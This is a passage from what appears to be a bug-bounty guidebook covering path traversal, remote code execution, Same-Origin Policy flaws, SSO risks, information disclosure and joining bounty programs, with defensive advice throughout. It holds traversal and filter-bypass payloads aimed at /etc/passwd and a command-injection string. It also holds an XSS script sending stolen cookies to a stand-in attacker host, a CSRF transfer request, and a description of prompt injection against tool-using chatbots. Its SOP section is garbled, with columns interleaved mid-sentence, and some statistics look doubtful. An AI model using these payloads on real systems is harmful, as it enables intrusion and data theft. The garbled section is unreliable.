Server configuration:
- Disable access to unnecessary directories.
- Restrict file and directory permissions.

Security patches:
- Keep software up to date to fix known vulnerabilities.

Examples of Attacks and Payloads

- Reading files:
1. http://example.com/download.php?file=../../../etc/passwd
2. http://example.com/view.php?page=../../../../var/www/html/index.php

- Code execution (if file uploading is allowed):
1. Upload a shell.php file with malicious content.
2. Access it through: http://example.com/uploads/shell.php

Useful Tools

- DirBuster: Brute force tool to discover hidden directories and files.
- w3af: Web penetration testing framework with a module to detect Directory Traversal.


Bypass protection

Developers implement various protections to mitigate this risk, but clever attackers are always looking for ways to bypass them. This chapter explores common evasion techniques and how defenders can strengthen their systems.

Common Evasion Techniques

Encoding the ".." sequence:
Purpose: To hide the ".." sequence that indicates a move up the directory tree.
Methods:
- URL encoding: %2e%2e/
- Double URL encoding: %252e%252e/ (defeats a filter that runs before a second decoding step)
- IIS-style Unicode encoding: %u002e%u002e/

Path Manipulation:
Purpose: To confuse the security filter with alternative file paths.
Methods:
- Relative paths: file/../../etc/passwd
- Absolute paths: /var/www/html/../../../etc/passwd
- Paths with repeated sequences: ....//....//etc/passwd

Null Termination Attacks:
Purpose: Bypass filters that check the end of the path, such as an enforced ".jpg" extension, on runtimes that truncate strings at a null byte.
Method: Add a null character (%00) before the expected suffix: ../../../etc/passwd%00.jpg
(Null-byte truncation was fixed in modern PHP and in most current runtimes; treat it as a legacy technique.)

UTF-8 Based Directory Traversal Attacks:
Purpose: To take advantage of alternative encodings of special characters in UTF-8.
Method: Use overlong encodings of the slash such as ..%c0%af or ..%e0%80%af instead of "../".

Attacks on Applications that Normalize Paths:
Purpose: Exploit applications that simplify or normalize paths before validating them, or that validate before normalizing.
Method: Use sequences such as // or repeated .. to manipulate the resulting path.

Strengthening Defenses

Strict Validation of Inputs:
1. Validate all user input and reject any suspicious sequences.
2. Use whitelists to allow only specific paths and characters.

Input Sanitization:
1. Remove or replace special characters that can be used for directory traversal.

Use of Canonical Paths:
1. Decode once and convert every path to its canonical form (resolving "..", duplicate slashes and symbolic links) before processing.
2. Check that the canonical path is inside the intended directory. This eliminates ambiguity and makes path manipulation much more difficult.

Secure Server Configuration:
1. Disable the following of symbolic links if it is not necessary.
2. Restrict access to sensitive directories with appropriate file permissions.

Constant Updating and Patching:
- Keep server software and libraries up to date to correct known vulnerabilities.

Example Attack and Mitigation

- Attack: An attacker attempts to access the /etc/passwd file using the following URL: http://ejemplo.com/images/../../../etc/passwd
- Mitigation: The server implements strict input validation and rejects the request because of the presence of the ../ sequence. Rejecting on the literal sequence alone is exactly the filter the encoding tricks above defeat, so the decision should be based on the canonical path, not on the raw input.

Conclusion

Evading directory traversal protections is a constant challenge in web security. By understanding evasion techniques and strengthening defenses, developers can protect their applications and data more effectively.
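The payload list from the previous chapter and the encoding, null-byte and normalization tricks above, run against a blocklist filter and against a canonical-path check, as an added example in Python (not code from the book). The document root /var/www/html, the .jpg-only endpoint and the lenient decoder (double percent-decoding, acceptance of the overlong C0 AF sequence as a slash, truncation at a null byte) are constructed to model the server behaviours the text describes; the file system is never touched.

```python
"""Path traversal payloads against a blocklist filter and against a
canonical-path check. Added example; the document root, the handlers and the
lenient decoder are constructed to model the behaviours the text describes,
not taken from any real server."""
import posixpath
from urllib.parse import unquote, unquote_to_bytes

WEB_ROOT = "/var/www/html"          # assumed document root

# Constructed payloads, all aimed at an endpoint that only serves *.jpg.
PAYLOADS = {
    "plain":           "../../../../etc/passwd%00.jpg",
    "dot-dot-double":  "....//....//....//etc/passwd%00.jpg",
    "url-encoded":     "..%2f..%2f..%2fetc/passwd%00.jpg",
    "double-encoded":  "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd%00.jpg",
    "overlong-utf8":   "..%c0%af..%c0%af..%c0%afetc/passwd%00.jpg",
    "encoded-no-null": "..%2f..%2f..%2fetc/passwd.jpg",
    "benign":          "cats/kitten.jpg",
}


def lenient_decode(raw: str) -> str:
    """Models a permissive server stack: percent-decodes twice (reverse proxy
    plus application), accepts the overlong UTF-8 sequence C0 AF as '/', and
    truncates at a NUL byte the way a C string would."""
    data = unquote_to_bytes(unquote_to_bytes(raw))
    data = data.replace(b"\xc0\xaf", b"/")
    data = data.split(b"\x00", 1)[0]
    return data.decode("utf-8", errors="replace")


def inside_root(path: str) -> bool:
    return path == WEB_ROOT or path.startswith(WEB_ROOT + "/")


def naive_handler(raw: str):
    """Blocklist applied to the raw value: require a .jpg suffix, strip '../'
    once, then decode and join. Returns the path that would be opened."""
    if not raw.endswith(".jpg"):
        return None
    stripped = raw.replace("../", "")
    return posixpath.normpath(posixpath.join(WEB_ROOT, lenient_decode(stripped)))


def safe_handler(raw: str):
    """Decode exactly once, reject NUL, canonicalise, then check containment
    on the canonical result. A real server would also resolve symlinks with
    os.path.realpath before the containment check."""
    decoded = unquote(raw)
    if "\x00" in decoded or not decoded.endswith(".jpg"):
        return None
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded))
    return candidate if inside_root(candidate) else None


def classify(handler) -> dict:
    """'rejected', 'inside' or 'ESCAPED' for every payload."""
    result = {}
    for name, payload in PAYLOADS.items():
        path = handler(payload)
        if path is None:
            result[name] = "rejected"
        else:
            result[name] = "inside" if inside_root(path) else "ESCAPED"
    return result


if __name__ == "__main__":
    for label, handler in (("naive", naive_handler), ("safe", safe_handler)):
        print(label)
        for name, verdict in classify(handler).items():
            print(f"  {name:16} {verdict}")
```

The blocklist stops only the textbook "../" payload; every encoded, doubled or overlong variant reaches /etc/passwd because the filter runs on the raw value and the decoder runs afterwards. The safe handler never inspects the input for ".." at all: it decodes once, refuses a null byte, builds the canonical path and then asks the only question that matters, whether that path is still under the document root.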
2.14 - REMOTE CODE EXECUTION (RCE) #2.14

What is RCE, or remote code execution?

A cybersecurity flaw known as remote code execution (RCE) gives an attacker the ability to execute code of their choosing over a network on a target device or server. RCE is a serious concern because, unlike many other threats, it does not require prior access to the target system.

It is considered a particular type of arbitrary code execution (ACE), which refers to the ability of an attacker to execute any command on a target system or within a target process. RCE is distinguished by the fact that the code is executed remotely, giving attackers control of a compromised system from any location.

Updating software is essential, as many attacks exploit vulnerabilities that have already been patched.

The technical mechanism of RCE involves exploiting weaknesses in server-side programs or applications. These vulnerabilities can stem from many flaws, such as incorrect input validation, insecure deserialization or buffer overflows.

Attackers can trick the vulnerable application into executing malicious code with its own privileges by sending it specially crafted requests or data. Through this exploitation procedure, which goes beyond security protections, attackers gain unauthorized access to system resources, data and capabilities.

RCE attacks have the potential to cause malware proliferation, data breaches and unauthorized system control.

The development and current importance of RCE

Over time, remote code execution (RCE) attacks have changed from simple opportunities for hackers to exploit weaknesses in systems into sophisticated cyber attacks targeting important infrastructure and organizations.

The origin of RCE dates back to the early years of networked computing, when software flaws served as entry points for illegal remote interaction with systems.

RCE attacks became increasingly common as digital infrastructure became more complex and connected. As a result, hackers and state-sponsored actors began to target these vulnerabilities in order to use them for a variety of nefarious purposes.

It is impossible to overstate the importance of RCE in today's digital age. The increasing reliance on digital platforms and services has increased the potential impact of RCE attacks, creating risks to the operational continuity of key infrastructures and services, as well as to data security.

Attackers who can execute arbitrary code remotely can take control of systems, steal sensitive information, deploy ransomware or even disrupt services. These actions can have a significant negative impact on an organization's finances and reputation.

Current statistics and trends show how things are becoming increasingly dangerous.

Well-known vulnerabilities affecting millions of devices and systems worldwide, such as the Log4Shell vulnerability (CVE-2021-44228) in the Apache Log4j logging library, have demonstrated the wide potential for exploitation.

Due to the sheer ease of exploitation of the vulnerability and the variety of systems it affects, the industry as a whole expressed grave concern and quickly called for mitigation. The exploitation of these weaknesses demonstrates the experience and tenacity of attackers in identifying and manipulating vulnerabilities in digital systems for malicious purposes.

In addition, the COVID-19 pandemic changed the character of cyber attacks, with a discernible shift away from more conventional techniques such as Trojans or backdoors and toward the exploitation of vulnerabilities.

According to Imperva data, path traversal attacks make up 28% of recent intrusions, with RCE attacks in second place. This suggests that hackers have strategically shifted their focus to the most effective ways to infiltrate systems.

RCE is now a major cybersecurity risk due to the complexity and interconnectedness of the modern digital ecosystem. To defend against the constantly evolving threat posed by RCE attacks, both individuals and organizations must take comprehensive security measures and remain alert.

How do attacks use remote code execution?

Attacks using remote code execution (RCE) often involve multiple steps and have the potential to cause serious data breaches, compromise systems and enable other malicious acts.

1. Finding vulnerabilities: The attacker starts by locating software flaws in the victim's operating system, web server or application. These vulnerabilities could be zero-day flaws that were previously unknown to the public, or known issues that have not been patched.

2. Creating and delivering the exploit: Once the attacker has located a vulnerability, they write an exploit, the code that triggers it. The exploit is delivered to the target system by a variety of means, including direct attacks on vulnerable services, social engineering and malicious emails.

3. Executing malicious code: The exploit triggers the vulnerability, giving the attacker the ability to inject and execute malicious code on the machine. With this code, sometimes referred to as the payload, the attacker can take control of the system and perform malicious operations such as data theft and system disruption.

RCE attacks can exploit a variety of flaws, such as buffer overflows, which occur when an application writes more data to a buffer than it can hold, and injection vulnerabilities, which occur when a program executes unauthorized commands because user input was not properly sanitized. These vulnerabilities allow attackers to gain unauthorized access to systems and execute arbitrary code.

Several tactics are used to prevent RCE attacks: frequent vulnerability scanning to find and fix known vulnerabilities; strong input validation to stop injection vulnerabilities; and network monitoring to detect and stop exploitation attempts.

The effects of RCE attacks

RCE attacks can have catastrophic effects on both individuals and enterprises, resulting in the distribution of ransomware, unauthorized cryptomining, data breaches, unauthorized access and denial of service (DoS). These attacks seriously jeopardize data security and privacy, while causing financial and reputational damage.

In order to reduce the likelihood of RCE attacks, companies should implement a comprehensive strategy that encompasses:

1. Vulnerability remediation and software upgrades, using secure coding practices.
2. Applying the principle of least privilege.
3. Deploying web application firewalls (WAFs) and intrusion detection/prevention systems (IDS/IPS).
4. Performing code audits and security testing.

Numerous notable RCE vulnerabilities have been identified in recent years, including CVE-2020-17051 affecting a Microsoft Windows communication protocol, CVE-2020-1844 in Apple operating system components, CVE-2021-44228 (Log4Shell) in Apache Log4j, and CVE-2019-8942 in WordPress.

These weaknesses demonstrate the crucial importance of vigilance and of preventive security measures to defend against RCE attacks.

Real-world consequences and dangers

The practical consequences and dangers associated with remote code execution (RCE) in AI systems, especially when it comes to large language models (LLMs), are manifold and range from spreading malware to data theft and server takeovers.

One possible scenario is an AI-powered customer support chatbot that is manipulated by a prompt containing malicious instructions. If the chatbot can execute code or call tools on its server, such a prompt can lead to a serious breach, giving unauthorized access to the chatbot's server.

In this particular case, prompt injection attacks represent a significant vulnerability.

By inserting malicious prompts or directives into LLM inputs, adversaries can manipulate these models into performing illicit actions or disclosing sensitive information. These attacks take advantage of the complexity and adaptability of LLMs, which are designed to handle huge volumes of data and produce outputs in response to user inputs. Manipulation of these inputs can have unintended and potentially dangerous effects, such as data breaches, illegal system access or the spread of malware through AI-driven platforms.

In an effort to strengthen the security and reliability of AI systems, ethical frameworks and standards are being implemented. The development of ethical standards in AI, such as accountability, fairness, transparency and non-misappropriation, is essential to creating reliable and secure AI applications.

In an effort to reduce the dangers associated with technologies such as LLMs, these guidelines direct the development and implementation of AI systems. Furthermore, investigating these ethical aspects of AI highlights the crucial importance of striking a balance between algorithmic accuracy and fairness, privacy and accountability, to ensure that AI technologies are applied in a way that upholds human rights and promotes social good.

Ensuring the resilience and security of AI tools and APIs against potential RCE attacks is crucial during the creation and implementation of these systems. The community must be aware of vulnerabilities in AI systems and constantly evaluate and strengthen security measures as AI advances.

Important lessons learned

Cybercriminals continue to use remote code execution (RCE) attacks as a dangerous weapon. A deep awareness of the risk environment is essential to staying secure. The key things to remember are:

- RCE flaws are a serious risk, as they give attackers the ability to remotely execute malicious code on your computers.
- Attacks can target both AI models and conventional systems, so new security measures with an AI-specific focus are needed.
- Proactive mitigation is essential: this covers multi-layered security, robust input validation and routine remediation.
- AI is both a target and a protection mechanism. Protect AI implementation tools, models and procedures.
- It is imperative to act: Put into practice what you have learned, by working with AI security specialists and implementing the suggested security measures.

The best protection against RCE threats is constant vigilance and proactive security measures. A stronger and more resilient cybersecurity posture can be achieved by recognizing the severity of the dangers and taking appropriate action.

Bypass protection

RCE stands as one of the most critical and sophisticated threats. This type of attack allows a cybercriminal to bypass a system's security measures and execute malicious code remotely, thereby gaining unauthorized control over the target system.

Understanding the Anatomy of the Attack

To understand the magnitude of this threat, it is crucial to unravel the anatomy of an RCE attack that bypasses existing protections. In essence, this attack is based on exploiting vulnerabilities in software or system configurations. These vulnerabilities can range from programming errors to incorrect access permission settings.

Once a cybercriminal identifies a vulnerability that can be exploited, he designs an attack that allows him to bypass existing security measures. This may involve manipulating input parameters, injecting malicious code, exploiting buffer overflows, or using social engineering techniques to trick users into granting unauthorized access.

Devastating Consequences

The consequences of such an attack can be devastating. A cybercriminal who succeeds in executing malicious code on a system can gain access to sensitive data, install malware, alter the operation of the system, and even take complete control of it.

In the context of a Bug Bounty program, responsible identification and disclosure of vulnerabilities that enable this type of attack is of the utmost importance. By reporting these vulnerabilities, security researchers contribute to strengthening system security and protecting users from potential malicious attacks.

Prevention and Mitigation

Preventing and mitigating RCE attacks requires a multifaceted approach. Some of the key measures include:

- Secure Development: Implement secure development practices to minimize the introduction of vulnerabilities into software.
- Software Updates: Keep software up to date with the latest security patches to correct known vulnerabilities.
- Input Validation: Implement input validation mechanisms to prevent malicious code injection.
- Access Control: Implement strict access controls to limit user privileges and prevent unauthorized access.
- Security Monitoring: Implement security monitoring systems to detect and respond to possible attacks.
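The injection flavour of RCE described in this chapter (user input that was never sanitized reaching a shell), next to the input validation the prevention list calls for, as an added example in Python (not code from the book). The hostname lookup endpoint, the allowlist pattern and the attacker input are constructed; echo stands in for the real diagnostic tool so the block runs anywhere with /bin/sh.

```python
"""Command injection, the injection flavour of RCE: a vulnerable handler, an
argv-only handler and a hardened one. Added example; the endpoint and the
attacker input are constructed for the demo."""
import re
import subprocess

# Allowlist for a hostname parameter (assumption for the demo).
HOSTNAME_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def lookup_vulnerable(hostname: str) -> str:
    """String-builds a command line and hands it to /bin/sh. Shell
    metacharacters in the input (';', '|', '$(...)') become new commands.
    'echo' stands in for a real tool such as ping or nslookup."""
    cmd = f"echo resolving {hostname}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_argv_only(hostname: str) -> str:
    """No shell: the input travels as a single argv element, so the
    metacharacters are just bytes inside one argument. Still no validation."""
    argv = ["echo", "resolving", hostname]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def lookup_hardened(hostname: str) -> str:
    """Allowlist first, argv second: defence in depth for the same endpoint."""
    if not HOSTNAME_RE.fullmatch(hostname):
        raise ValueError(f"rejected hostname: {hostname!r}")
    return lookup_argv_only(hostname)


def hardened_rejects(hostname: str) -> bool:
    """True when the hardened handler refuses the value."""
    try:
        lookup_hardened(hostname)
    except ValueError:
        return True
    return False


def injection_succeeded(output: str, marker: str = "INJECTED") -> bool:
    """Oracle for the demo: the injected second command prints the marker
    on a line of its own; a single echoed argument cannot do that."""
    return any(line.strip() == marker for line in output.splitlines())


if __name__ == "__main__":
    payload = "example.com; echo INJECTED"          # constructed attacker input
    print("vulnerable :", repr(lookup_vulnerable(payload)))
    print("argv-only  :", repr(lookup_argv_only(payload)))
    print("hardened rejects payload:", hardened_rejects(payload))
    print("hardened ok:", repr(lookup_hardened("example.com")))
```

The first handler prints the marker on its own line, proof that the attacker's second command ran. The argv-only handler returns the whole payload as one echoed argument, so the injection fails even without validation; the allowlist on top of it turns an attack into a logged rejection. In real code the marker would be a reverse shell or a file write, and the tool would be ping, nslookup, a PDF converter or anything else the application shells out to.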


2 . 1 5 - SA M E - O R I G I N
PO LI CY B U G S # 2. 1 5 Example:
JavaScript

<script>
The Same-Origin Policy (SOP) is a crucial security mecha- var cookies = document.cookie;
nism in web browsers. It acts as a security guard, preventing // Send cookies to a server controlled by the attacker.
scripts from one source (a combination of protocol, domain and new Image().src = 'https://atacante.com/robar?cookies='
port) from accessing data from another source. Imagine that + cookies;
every website is a house; the SOP ensures that your neighbors </script>
can't break in and steal your stuff.
2. Cross-Site Request Forgery (CSRF): An attacker tricks
However, like any security system, SOP is not foolproof. a user's browser into sending a malicious request to a web-
Vulnerabilities in the SOP can allow malicious attackers to breach site where the user is logged in. This can result in unauthorized
these barriers, accessing sensitive information or performing actions, such as changing the email address or making a purchase.
unauthorized actions on the user's behalf.
Example:
Why is Same-Origin Policy important? HTML

The SOP is critical to protecting users' privacy and security <img src="https://banco.com/transferir?destinatario=ata-
on the web. Without it, a malicious website could: cante&cantidad=1000" />

- Steal your cookies: Cookies store session information, JSONP (JSON with Padding): JSONP allows a website to
such as login credentials. An attacker could use them to imper- request data from another source. If not implemented correctly,
sonate you. an attacker can use JSONP to gain access to sensitive data.

- Read your private data: They could access personal infor- Example:
mation on other websites, such as your browsing history or pri- JavaScript
vate messages.
function handleResponse(data) {
- Perform actions on your behalf: An attacker could send // Attacker can access the data here
messages, make purchases or change your settings without console.log(data);
your consent. }

Common SOP Vulnerabilities var script = document.createElement('script');


script.src = ' h t t p s : // o t r o s i t i o . c o m /
Despite its importance, SOP can be vulnerable to attacks. datos?callback=handleResponse';
Some of the most common include: document.head.appendChild(script);

1. Cross-site scripting (XSS): an attacker injects mali-


cious code into a legitimate website. When a user visits the site,
the code executes in their browser, potentially stealing their data
or performing unauthorized actions.

118 MILLIONAIRE RECORDS


Mitigating SOP Vulnerabilities

To protect against these attacks, it is crucial to implement the following security measures:

- Input validation and output encoding: Always validate user-entered data and encode it when it is written back into the page, so that it cannot be interpreted as script. This prevents XSS attacks.

- CSRF tokens: Use unpredictable, per-session CSRF tokens on every state-changing request, and have the server reject any request whose token is missing or does not match. Because the attacker's page cannot read the token across origins, it cannot forge a valid request. State changes should never be performed on GET requests, which is exactly what the <img> example above abuses.

- Content Security Policy (CSP): Implement CSP to control which scripts can be loaded and executed on your website, which limits what an injected script can do.

- Secure JSONP configuration: If you use JSONP, make sure it is configured securely to prevent data disclosure: never expose authenticated or sensitive data through it, and validate the callback parameter so it cannot be used to inject script. Where possible, replace JSONP with CORS and an explicit allowlist of origins.

Same-Origin Policy is an essential web security tool, but it is not perfect. Understanding its limits and how to mitigate them is crucial to protecting your data and privacy online.

2.16 - SINGLE SIGN-ON (SSO) #2.16

Imagine having a single key that opens all the doors to your home, your car, your office and even your safe. Sounds convenient, doesn't it? But what if that key were to get lost or fall into the wrong hands? In the digital world, Single Sign-On (SSO) is like that master key: it allows you to access multiple applications and services with a single set of credentials. However, this convenience comes with security risks that should not be ignored.

What is SSO and why is it popular?

SSO is an authentication mechanism that allows users to access multiple applications and websites with a single login. Instead of having to remember different usernames and passwords for each service, users only need to remember one set of credentials to access all of them.

This convenience has made SSO very popular with both users and enterprises. For users, it means fewer passwords to remember and a smoother user experience. For enterprises, SSO can reduce support costs and improve employee productivity.

The Security Risks of SSO

Despite its advantages, SSO also presents significant security risks:

1. Single Point of Failure: If a user's SSO credentials are compromised, an attacker could gain access to all applications and services linked to that account. This can have devastating consequences, especially if business-critical applications or applications containing sensitive data are involved.

2. Phishing Attacks: Attackers can use phishing techniques to trick users into revealing their SSO credentials. Once they have the credentials, they can access all linked accounts.

3. Vulnerabilities in the Identity Provider (IdP): The IdP is the service that manages SSO credentials and verifies the identity of users. If the IdP has vulnerabilities, an attacker could exploit them to gain access to user accounts.

4. Session Management: If SSO sessions are not properly managed, an attacker could hijack an active session and gain access to user accounts without needing to know the user's credentials.

Examples of SSO Attacks

- Phishing Attack: An attacker sends a spoofed email that appears to come from a legitimate service (e.g., Google or Microsoft). The email contains a link to a fake login page that looks like the real page. When the user enters their SSO credentials on the fake page, the attacker captures them and uses them to access their accounts.

- Token Reinjection (Replay) Attack: An attacker intercepts a valid SSO session token and injects it into their own browser. This allows them to impersonate the legitimate user and access that user's accounts without needing to know the credentials.

- Brute Force Attack against the IdP: An attacker uses a program to try thousands of username and password combinations until one works. If the IdP does not have adequate protection measures, such as locking accounts or slowing down logins after several failed attempts, the attacker could gain access to users' accounts.

Mitigating SSO Security Risks

To protect against SSO security risks, it is crucial to implement the following security measures:

- Two-Factor Authentication (2FA): Require users to provide a second factor of authentication, such as a code sent to their cell phone, in addition to their password. Note that a code typed into a web page can be phished along with the password; a phishing-resistant factor such as a hardware security key, which only responds to the genuine site's origin, also defeats the fake login page described above.

- Secure Session Management: Implement security measures to protect SSO sessions, such as short session timeouts, regenerating the session token after each login, and invalidating tokens on logout, so that an intercepted token stops working as soon as possible.

- Monitoring and Anomaly Detection: Use monitoring tools to detect suspicious activity, such as repeated failed login attempts or access from unusual locations.

- Security Patching: Keep IdP software and linked applications up to date with the latest security patches.

SSO offers great convenience, but it is important to be aware of the security risks involved. By implementing the right measures, you can minimize these risks and enjoy the benefits of SSO without compromising the security of your data and systems.

2.17 - INFORMATION DISCLOSURE #2.17

Imagine you are playing poker and you accidentally show your cards to the other players. In the digital world, Information Disclosure is like showing your cards: it reveals sensitive data that should remain hidden, giving attackers an unfair advantage.

Information disclosure is a vulnerability that occurs when a web application inadvertently discloses sensitive data to unauthorized users. This data can include technical information about the application, configuration data, detailed error messages or even user data.

Why is Information Disclosure Dangerous?

Although often considered a low-risk vulnerability, information disclosure can have serious consequences:

- Reconnaissance: Attackers can use the disclosed information to learn more about the application and its vulnerabilities, facilitating future attacks.

- Privilege Escalation: Disclosed information can help attackers gain access to restricted areas of the application or elevate their privileges.

- Targeted Attacks: Attackers can use the disclosed information to launch more targeted and effective attacks.

- Reputation Damage: Disclosure of confidential information can damage a company's reputation and erode the trust of its customers.

Common Types of Information Disclosure

1. Detailed Error Messages: When an application encounters an error, it sometimes displays error messages that reveal internal application details, such as file paths, variable names or SQL queries. Attackers can use this information to identify and exploit vulnerabilities.

Example:
---------
Error connecting to database: Access denied for user 'root' on 'localhost' (using password: YES).
---------

This single line tells an attacker that the application connects to its database as the all-powerful root account, that the database runs on the same host as the web server, and that the application authenticates with a password, all useful for a targeted attack.

2. Disclosure of Configuration Files: Configuration files often contain sensitive information, such as database passwords, API keys, or service account credentials. If these files are not properly protected, attackers can access them and use the information to compromise the application.

3. Disclosure of Debugging Information: Debugging tools can reveal detailed information about the inner workings of an application, such as variable values, stack traces, and event logs. If these tools are not disabled in production, attackers can use them to obtain valuable information.

4. Metadata Disclosure: Metadata is data about data, such as software version, operating system or HTTP headers. Attackers can use this information to identify known vulnerabilities in the software or to create targeted attacks.

How to Prevent Information Disclosure

To protect your application from information disclosure, follow these best practices:

- Generic Error Messages: In production, display generic error messages that do not reveal internal application details. Log the full detail on the server instead, where developers can still use it.

- Protect Configuration Files: Store configuration files outside of the web root folder and ensure that they are protected with appropriate permissions.

- Disable Debugging Tools: Disable all debugging tools in production to prevent attackers from accessing sensitive information.

- Metadata Removal: Remove unnecessary metadata from files and HTTP headers, such as version-revealing Server and X-Powered-By headers, to reduce the attack surface.

Information disclosure may seem like a minor vulnerability, but it can have serious consequences for the security of your application. By implementing the right security measures, you can protect your data and systems from attackers and prevent your secrets from getting out.

Closing Notes

In this chapter, we have explored some of the most common and dangerous web vulnerabilities lurking in the vast digital world. From code injection to information disclosure, we have seen how attackers can exploit these flaws to compromise web application security and steal sensitive data.

However, we should not despair. By understanding these vulnerabilities and their exploitation mechanisms, we are better equipped to protect ourselves. Implementing robust security measures, such as input validation, query parameterization and the use of security tools, can significantly reduce the risk of falling victim to a cyberattack.

Remember, web security is an ongoing process, not a final destination. As attackers develop new techniques, we must adapt and strengthen our defenses. Staying up-to-date on the latest threats and vulnerabilities is crucial to protecting your applications and your users.

If you are interested in becoming a bug bounty hunter, this chapter has provided you with a solid foundation to get started; now it's time to put what you've learned into practice and start looking for vulnerabilities!

CHAPTER THREE

BEYOND TECHNIQUE

HOW LOGGING ON TO A WEBSITE CAN CHANGE YOUR LIFE

3.1 - BUG BOUNTY PROGRAMS #3.1

Welcome to the exciting world of bug bounty programs! If you've made it this far, it means you're ready to take the next step in your journey as an ethical hacker. In this chapter, I'll reveal the secrets to finding and participating in bug bounty programs that will allow you to put your skills to use, earn money and, who knows, maybe even become a millionaire!

What are Bug Bounty Programs?

Bug bounty programs are initiatives in which companies invite ethical hackers to look for vulnerabilities in their systems and applications. In exchange for reporting these security flaws in a responsible manner, companies offer financial rewards that can range from a few dollars to many thousands of dollars for a single finding, and cumulative earnings can reach millions.

These programs are a win-win situation: companies improve the security of their products, ethical hackers get recognition and rewards for their work, and end users enjoy more secure applications and services.

Why Should You Participate in Bug Bounty Programs?

Bug bounty programs offer a number of benefits for both novice and expert hackers:

- Potential Gains: As I mentioned, the rewards can be very generous, especially if you find critical vulnerabilities. Many hackers have managed to turn bug bounty into their main source of income, and some, like me, have even reached millionaire status.

- Continuous Learning: Bug bounty programs expose you to a wide variety of technologies and vulnerabilities, allowing you to constantly learn and improve your skills.

- Recognition and Reputation: By finding and reporting vulnerabilities, you can build a solid reputation in the computer security community, which will open doors to new job opportunities and collaborations.

- Contribution to Society: By helping companies improve the security of their products, you are helping to make the Internet a safer place for everyone.

How to Find Bug Bounty Programs

There are numerous platforms that connect ethical hackers with companies offering bug bounty programs. One of the most popular and respected is HackerOne.

HackerOne is a platform that hosts hundreds of bug bounty programs from companies around the world. You can filter programs by technology, reward, difficulty level and other criteria to find those that match your interests and skills.

Other popular platforms include:

- Bugcrowd
- Intigriti
- YesWeHack

In addition to these platforms, many companies have their own private bug bounty programs. You can find them by searching the company's website or by contacting their security team directly.

How to Choose the Right Bug Bounty Program

Not all bug bounty programs are the same. Some focus on web applications, while others focus on desktop software or mobile devices. Some offer higher rewards, but they can also be more competitive.

To choose the right program for you, consider the following factors:

- Your Interests and Skills: Are you more interested in web applications, desktop software or mobile devices? What technologies do you have the most experience in?

- The Scope of the Program: What kind of vulnerabilities is the company looking for, and are there any restrictions on the testing techniques you can use?

- The Reward: How much does the company pay for each vulnerability found? Is there a maximum reward limit?

- The Program's Reputation: What do other hackers say about the program? Does the company respond quickly to vulnerability reports? Does it pay rewards on time?

How to Participate in a Bug Bounty Program

Once you've found a program that interests you, the next step is to register and carefully read the program rules. These rules specify what types of vulnerabilities are within the scope of the program, what testing techniques are allowed, and how you should report your findings.

Once you are familiar with the rules, you can start looking for vulnerabilities. Use the tools and techniques we have seen in previous chapters, such as vulnerability scanners, fuzzing, and manual code analysis, keeping in mind that many programs restrict or forbid automated scanning, so check the rules before running any tool against a target.

When you find a vulnerability, be sure to document it clearly and in detail. Include steps to reproduce the problem, screenshots and any other relevant information. Then, submit your report to the company via the bug bounty platform or their responsible disclosure channel.

Tips to Maximize your Bug Bounty Profits

- Focus on Quality Programs: Not all bug bounty programs are the same. Some offer better rewards and have a better payout history than others. Do your research and choose reputable programs.

- Specialize in One Area: Instead of trying to cover everything, focus on one specific area, such as web applications, desktop software or mobile devices. This will allow you to develop greater expertise and find more complex vulnerabilities.

- Learn Constantly: Technology evolves rapidly, and so do vulnerabilities. Keep up with the latest hacking trends and techniques to stay competitive.

- Collaborate with Other Hackers: Bug bounty is not a competition but a community. Collaborating with other hackers can help you learn new techniques, share information and find vulnerabilities faster.

- Be Professional and Responsible: Report your findings clearly and concisely, and work with the company to fix problems responsibly. This will help you build a good reputation and get more invitations to private programs.

Conclusion: Your Future in Bug Bounty

Bug bounty is an exciting and growing industry. If you have a passion for technology, security and problem-solving, bug bounty may be the perfect career for you.

With dedication, perseverance and the right tools, you can become a successful bounty hunter and help make the Internet a safer place for everyone.

MY ADVICE

HackerOne: your gateway to the world of bug bounty. You will learn how to register, find programs, report vulnerabilities and earn money. Santiago advises you to start with small programs, and to be patient, ethical and responsible.

Here are specific steps on how you can start changing your life.

1. Access HackerOne's website: Open your web browser and go to HackerOne's home page: https://www.hackerone.com/.
2. Click on "Sign Up": In the top right corner of the page, you will find a button that says "Sign Up". Click on it.
3. Choose your account type: You will be presented with two options: "Hacker" (for security researchers) and "Company" (for companies). Select "Hacker".
4. Complete the registration form: Enter your email address and create a secure password. Accept HackerOne's terms of service and privacy policy.
5. Verify your email: HackerOne will send you a verification email. Open the email and click on the verification link to confirm your account.
6. Complete your profile: Once you have verified your email, you will be asked to complete your HackerOne profile. This includes information such as your name, country of residence and hacking skills.
7. Join bug bounty programs: Now that you have a HackerOne account, you can start searching for and joining bug bounty programs. You can explore available programs on HackerOne's programs page: [invalid URL removed].

Additional Tips:

- Read the program rules: Before joining a program, be sure to carefully read the program rules. These rules specify what types of vulnerabilities are within the scope of the program, what testing techniques are allowed, and how you should report your findings.

- Start with smaller programs: If you are new to bug bounty, it is advisable to start with smaller, less competitive programs. This will allow you to gain experience and build your reputation before taking on larger, more challenging programs.

- Be patient and persistent: Finding vulnerabilities can take time and effort. Don't get discouraged if you don't find anything right away. Keep learning and practicing, and eventually you will succeed.

- Be ethical and responsible: Always report your findings responsibly to the company through the bug bounty platform. Don't try to exploit vulnerabilities for your own benefit.

3.2 - RESPONSIBLE COMMUNICATION AND DISCLOSURE #3.2

In the fast-paced world of cybersecurity, where threats are constantly evolving, responsible vulnerability communication and disclosure stand as fundamental pillars for building a more secure and resilient digital environment. This chapter will explore the crucial importance of sharing vulnerability information in an ethical and constructive manner, safeguarding users and fostering collaboration between security researchers, businesses and the community at large.

Why is Responsible Disclosure Essential?

Imagine discovering a critical flaw in widely used software, an open door for cybercriminals to exploit and wreak havoc. What would you do with that knowledge? Disclosing it irresponsibly, without giving developers time to fix it, could unleash a wave of devastating attacks. On the other hand, keeping it secret would perpetuate the risk and leave users exposed.

Responsible disclosure offers a balanced solution. By privately informing developers about vulnerabilities, we give them the opportunity to create patches and updates before the information is made public. This minimizes risk to users and ensures that fixes are available when the vulnerability is disclosed.

The Responsible Disclosure Process

1. Discovery: A security researcher, whether a seasoned professional or a passionate enthusiast, identifies a vulnerability in a system or software.

